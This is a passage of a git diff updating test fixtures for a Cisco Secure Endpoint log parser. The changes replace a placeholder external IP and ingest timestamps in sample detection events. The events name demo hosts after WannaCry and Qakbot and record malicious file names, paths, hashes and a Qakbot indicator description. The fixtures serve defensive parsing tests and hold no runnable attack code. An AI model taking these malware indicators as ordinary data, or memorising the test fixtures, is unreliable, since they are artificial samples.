sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4022,7 +4022,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -4072,7 +4072,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4089,8 +4089,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103828588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461808700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4112,7 +4112,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4153,7 +4153,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4163,8 +4163,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103830803Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:51.461814700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -4184,7 +4184,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4225,7 +4225,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4235,8 +4235,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103832883Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461820300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4256,7 +4256,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4301,7 +4301,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -4311,8 +4311,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103834989Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461824200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4332,7 +4332,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log index 9842f3cbe93..1d8d7825cfd 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log @@ -1,49 +1,49 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was 